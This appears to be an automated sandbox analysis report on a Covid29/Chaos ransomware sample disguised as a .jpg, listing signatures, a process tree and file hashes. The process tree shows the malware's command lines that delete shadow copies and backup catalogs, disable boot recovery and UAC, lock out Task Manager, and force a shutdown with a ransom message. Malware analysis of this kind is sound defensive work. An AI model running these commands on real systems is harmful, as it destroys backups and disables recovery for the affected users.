Resubmissions

14-05-2024 16:25

240514-txchpsef38 3

14-05-2024 16:20

240514-ts6wraeb5s 3

09-05-2024 18:00

240509-wldmqsfa5x 10

Analysis

  • max time kernel
    641s
  • max time network
    643s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-05-2024 18:00

Errors

Reason
Machine shutdown

General

  • Target

    sorry your not sigma.jpg

  • Size

    309KB

  • MD5

    fab5851613dff70a9c68608ee9dc4764

  • SHA1

    83c97e70aa1f83554fa80e6b425ceea5b653f877

  • SHA256

    2d6eb433e813b2a938e494408091a0a5453248214951e548140f199f3e8c60cb

  • SHA512

    6afbb1fb0343bb9b6b672a3bab68b00e4a90ce3d5156806ca41affd5e392ab79e90de681d0fb4d3bb0523a7b1a1d3439ea65393bff09fcd55907bc8ef3f6ac4f

  • SSDEEP

    6144:HyTONaEEn4ykLsUHgEQ3FCbv0/AjRkKjNNSF9dP2+cqhhuCYz+i0M7m1RtYViKj0:HyTTEcVk4Uq1YIAeKjrSFDPhckuz+nh5

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 3 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops desktop.ini file(s) 34 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 28 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\sorry your not sigma.jpg"
    1⤵
      PID:1608
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1524
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaee72ab58,0x7ffaee72ab68,0x7ffaee72ab78
        2⤵
          PID:2272
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1728 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:2
          2⤵
            PID:2892
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1988 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:8
            2⤵
              PID:2568
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:8
              2⤵
                PID:3924
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3128 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:1
                2⤵
                  PID:860
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3148 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:1
                  2⤵
                    PID:4704
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4452 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:1
                    2⤵
                      PID:4532
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4604 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:8
                      2⤵
                        PID:216
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:8
                        2⤵
                          PID:4824
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:8
                          2⤵
                            PID:4320
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:8
                            2⤵
                              PID:4424
                            • C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
                              "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
                              2⤵
                                PID:3728
                                • C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
                                  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x260,0x264,0x268,0x23c,0x26c,0x7ff65412ae48,0x7ff65412ae58,0x7ff65412ae68
                                  3⤵
                                    PID:3616
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5068 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:8
                                  2⤵
                                    PID:4536
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4252 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:1
                                    2⤵
                                      PID:2236
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5060 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:1
                                      2⤵
                                        PID:1576
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2872 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:8
                                        2⤵
                                          PID:4696
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:8
                                          2⤵
                                            PID:1412
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=584 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:8
                                            2⤵
                                              PID:3076
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3288 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:2
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4428
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5140 --field-trial-handle=2028,i,13547893026548248250,5528233192252469035,131072 /prefetch:1
                                              2⤵
                                                PID:1112
                                            • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                              "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                              1⤵
                                                PID:2608
                                              • C:\Windows\System32\rundll32.exe
                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                1⤵
                                                  PID:3152
                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe"
                                                  1⤵
                                                    PID:860
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6C4E.tmp\TrojanRansomCovid29.bat" "
                                                      2⤵
                                                      • Checks computer location settings
                                                      • Modifies registry class
                                                      PID:4344
                                                      • C:\Windows\SysWOW64\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6C4E.tmp\fakeerror.vbs"
                                                        3⤵
                                                          PID:2580
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping localhost -n 2
                                                          3⤵
                                                          • Runs ping.exe
                                                          PID:1396
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                          3⤵
                                                          • Modifies registry key
                                                          PID:4336
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                          3⤵
                                                          • Modifies registry key
                                                          PID:4552
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                          3⤵
                                                          • Modifies registry key
                                                          PID:4420
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                          3⤵
                                                          • Modifies registry key
                                                          PID:1500
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                          3⤵
                                                          • Modifies registry key
                                                          PID:2492
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                          3⤵
                                                          • UAC bypass
                                                          • Modifies registry key
                                                          PID:4464
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                          3⤵
                                                          • UAC bypass
                                                          • Modifies registry key
                                                          PID:3152
                                                        • C:\Users\Admin\AppData\Local\Temp\6C4E.tmp\mbr.exe
                                                          mbr.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Writes to the Master Boot Record (MBR)
                                                          PID:3796
                                                        • C:\Users\Admin\AppData\Local\Temp\6C4E.tmp\Cov29Cry.exe
                                                          Cov29Cry.exe
                                                          3⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:1412
                                                          • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                            "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                            4⤵
                                                            • Checks computer location settings
                                                            • Drops startup file
                                                            • Executes dropped EXE
                                                            • Drops desktop.ini file(s)
                                                            • Sets desktop wallpaper using registry
                                                            • Modifies registry class
                                                            • Suspicious behavior: AddClipboardFormatListener
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2772
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                              5⤵
                                                                PID:3500
                                                                • C:\Windows\system32\vssadmin.exe
                                                                  vssadmin delete shadows /all /quiet
                                                                  6⤵
                                                                  • Interacts with shadow copies
                                                                  PID:2168
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic shadowcopy delete
                                                                  6⤵
                                                                    PID:1728
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                                  5⤵
                                                                    PID:1920
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                      6⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:4384
                                                                    • C:\Windows\system32\bcdedit.exe
                                                                      bcdedit /set {default} recoveryenabled no
                                                                      6⤵
                                                                      • Modifies boot configuration data using bcdedit
                                                                      PID:4312
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                    5⤵
                                                                      PID:3180
                                                                      • C:\Windows\system32\wbadmin.exe
                                                                        wbadmin delete catalog -quiet
                                                                        6⤵
                                                                        • Deletes backup catalog
                                                                        PID:3904
                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                                                      5⤵
                                                                        PID:2652
                                                                  • C:\Windows\SysWOW64\shutdown.exe
                                                                    shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                                    3⤵
                                                                      PID:3096
                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                      ping localhost -n 9
                                                                      3⤵
                                                                      • Runs ping.exe
                                                                      PID:3332
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im explorer.exe
                                                                      3⤵
                                                                      • Kills process with taskkill
                                                                      PID:4744
                                                                    • C:\Users\Admin\AppData\Local\Temp\6C4E.tmp\Cov29LockScreen.exe
                                                                      Cov29LockScreen.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:3468
                                                                • C:\Windows\system32\vssvc.exe
                                                                  C:\Windows\system32\vssvc.exe
                                                                  1⤵
                                                                    PID:4020
                                                                  • C:\Windows\system32\wbengine.exe
                                                                    "C:\Windows\system32\wbengine.exe"
                                                                    1⤵
                                                                      PID:3240
                                                                    • C:\Windows\System32\vdsldr.exe
                                                                      C:\Windows\System32\vdsldr.exe -Embedding
                                                                      1⤵
                                                                        PID:2924
                                                                      • C:\Windows\System32\vds.exe
                                                                        C:\Windows\System32\vds.exe
                                                                        1⤵
                                                                        • Checks SCSI registry key(s)
                                                                        PID:1932
                                                                      • C:\Windows\system32\LogonUI.exe
                                                                        "LogonUI.exe" /flags:0x4 /state0:0xa38f2855 /state1:0x41c64e6d
                                                                        1⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:3752

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        23207fbbcc348a2926c7a5b105115943

                                                                        SHA1

                                                                        8b84285cb7b50cf637643142ee7080ac0c97afcf

                                                                        SHA256

                                                                        a31ea99c67d2558f86f74e719c81d413c39c4002fe3f3acface965002cebf71a

                                                                        SHA512

                                                                        753aa535d46253995d955df1ceb11d6208b44e788c2183bd580fb92fedb28f29f74a56055d4de500775ce5f234fc8023938f0d64750a844e467aff75d89212de

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\903f9627-4b63-4f44-a7ea-610f6f78fe58.tmp

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        45ed9480fb0bee67350baeb42c22ab2a

                                                                        SHA1

                                                                        faa8b8911dadd651d52585dc3aef091ee5820064

                                                                        SHA256

                                                                        07d1fd10754f2b0e33b400a7a12295d9440a4da76d5c5cc29beda0ee8423f56a

                                                                        SHA512

                                                                        15abe46aa7f2aeba340893d15ca369ff4edc1094e2bd854f0ba2b46389614fb894901ce96cfa6a0a0c5420e0a29e85f0e06320e33d697c29beda696a7d5a1769

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        d31d12f957d0659e71cabbcebc33c9be

                                                                        SHA1

                                                                        70ebc03303bc2cff7c4f5cb2b76292f9512e9ca3

                                                                        SHA256

                                                                        66ce3e1765f709b65cd08bc54415f97ace1adbd649beae775cb5ff168925fd2f

                                                                        SHA512

                                                                        43d8e143f7c187109fa5dca423b6e99b54ebc1fb1bca3287b2ae24368389f172046768f55544b3e7d48d1cd89a282eb8e8787944cd0eabb4d049d9161a346551

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        11e80ce0771f27e6620e8ff62b6625c5

                                                                        SHA1

                                                                        9fc26a3f4511854461ebd043686115128c17b6cf

                                                                        SHA256

                                                                        8e5fad4df784e8e7b63ade3c81a4f5f9adeae9b2fef08c955806d5fae9d2acdb

                                                                        SHA512

                                                                        6dfde7e86d18e5ba3b5f8ea22ccd756fdbccf548a8788d6a30a1a93f9ea414573e4fee32b536be57fff1798ea8a91cafbf7bdc0a0581325ece70c469d1ab1c91

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        3222371d60ab32adb530800a93cd274d

                                                                        SHA1

                                                                        0d676034023797299449a1ca62d88ce40e5fdba6

                                                                        SHA256

                                                                        229056baab5eed1020c34ef2a807d05bea24dd13d3eb903ad63d6d80dcee9f8b

                                                                        SHA512

                                                                        ad0a9f3e0eaabef448a5142f953a954d1b80215ffd56ac03b6287a45eafabd79a01a352a30dd1af523a50a068ba02f77e550ee23a5bf6700318cfbdb79bb527d

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                        Filesize

                                                                        2B

                                                                        MD5

                                                                        d751713988987e9331980363e24189ce

                                                                        SHA1

                                                                        97d170e1550eee4afc0af065b78cda302a97674c

                                                                        SHA256

                                                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                        SHA512

                                                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        356B

                                                                        MD5

                                                                        b36bf4b2ef2a2d010374d970c7072092

                                                                        SHA1

                                                                        c79756a5d705788143475c6700f64bc3ecd04c30

                                                                        SHA256

                                                                        98f8d3adbcae24552b59206af27dff1c4ea276bfe2308b862e82553b7a5888b0

                                                                        SHA512

                                                                        765b512f00097b09919891860192edece34619c7b52032c13b997c9d3c99467cc14d5237ad1937ed0bfcc694d013a93df8322ef5cd6da7ed9bdf0d82a54e7d27

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        a21652a1e8ab073dc9f36595eadc983a

                                                                        SHA1

                                                                        0a68be372f0bf0f2f3f935400095fceba2a82fc3

                                                                        SHA256

                                                                        ad9ff022c326101b99990d8de77949af922c2a9a1ee5fbb1d78c95fc43dfd5da

                                                                        SHA512

                                                                        bbaa4e54c39958ca6b66a859e7c3c06b6f9f1bdf3c082377b9c60a1b55547dc8230a5d45f9e90a431e3e416df191b9c9ae41f08f694802d5c5d36941ae1af42c

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        e2056e00c48a2bab054695661c4a566e

                                                                        SHA1

                                                                        6a095a4423a806c173b537403df0442cebf67bd0

                                                                        SHA256

                                                                        fc3beaa245d8c3db2b297fe8cd6497bd86325a69a198f3ddddf4c6d86fcd654b

                                                                        SHA512

                                                                        7479a6b3680859ce7798e757f58048d551410b4df961148fdcc51cbf212996a976da958c895f950c20d27feeffbc2d34f23984077757d380f944cce8bbaef37b

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        b14170a8e7c0f87f6240bc76f6359b64

                                                                        SHA1

                                                                        bed2631e576a1f29680b41868ca01fab7bc6eb82

                                                                        SHA256

                                                                        bf9f9472089cf049eefcc80b14fb555d6da0680ee1a428cf636c627afb833ba7

                                                                        SHA512

                                                                        ba49618e8d4e7e2bb165cdfc155718478744fa66181fe66a073c0d8c88cfe3cc2450413e30118a9d446c55a743e41ec290d3d3e4b63209ddef58732a959a4377

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        942567fc9ba25e0d03b992d21030133e

                                                                        SHA1

                                                                        3b94eff3289d3894ea80c51d948da99e5c694b10

                                                                        SHA256

                                                                        3e5977ae2ec03225210fd0c9f7d2119557942d6b74c9c6cc87d0db97aa7fccc9

                                                                        SHA512

                                                                        827ffd671c9e41985b4cef70a837bbc582220b0b08666c31fd0a5ee7e16f2799370af4f34fc2b4cf67694bd76914e8f6d07237dfa98e1b5594ca3970faba5655

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        8KB

                                                                        MD5

                                                                        ef2427e879ace788cf9872694bdf4a59

                                                                        SHA1

                                                                        310a50d663d239266d72845aecd701fa07001fca

                                                                        SHA256

                                                                        21ce33117547b5b60567f1551477f23be1b182a0b689d88204a2312cb5653298

                                                                        SHA512

                                                                        1ab574809470078adb4fbad9fc4c62b8372d7a3940596b46682f8b127e8e6e3fab7815f5ae208e70033b4e78ceedf6a2c0f3e002317df46128c2fc5ea919a27c

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        7KB

                                                                        MD5

                                                                        bc20fb47ad6f0c0b28816fcaabfff6f1

                                                                        SHA1

                                                                        e651b30a745dc05e08384e7ad9a48da3f38963d9

                                                                        SHA256

                                                                        42f0ec88b39e3d643b7c8b76d159e2eb4fe5e690b2d30396fd3ae6ff63d6d1a6

                                                                        SHA512

                                                                        138147f3c44a93f83c42a5110fd357a387ec58bffb48f995e6827511e7c7258fb36776fa41dcc5aa27f8acd28d4df428616d92e0f3f89436fd020f8f8723f0bc

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        7KB

                                                                        MD5

                                                                        da922c8ac38c874c12d33b26495f15d8

                                                                        SHA1

                                                                        802bcc60642530c39c652ccaddb459f6837a2ebb

                                                                        SHA256

                                                                        b4b9ab3ded3adfa0b6afe52073ba2ae7fc77078929add6af064aaaf784cc0110

                                                                        SHA512

                                                                        5ed2aadce1627cf8b97a4d94bff17e89fe5557e24d86f6d491b0534f66ea077194d24fb489507cd73322a413c10b7476226dd382a8f2410bc2347a16c6eb3fb2

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        8KB

                                                                        MD5

                                                                        a8c1739fc66b2a12d5a064f6abcf5b78

                                                                        SHA1

                                                                        67b4f8395f5b10d73145b937eb35678596ca2fce

                                                                        SHA256

                                                                        146f1d488f99497eb7ee9268ce69fd148cb3f8b2b18b065b3fad469f65f342c6

                                                                        SHA512

                                                                        d64dd86b42d59dd33a152d2077eab672efd89210c605efb61db993ca31539ed88607d0b970c1990d4e5d6c9466ed78c0df5afb1f903e0fb0e7f16559f1ffa421

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                        Filesize

                                                                        16KB

                                                                        MD5

                                                                        887c134f115304b35eed86ca5a677bf6

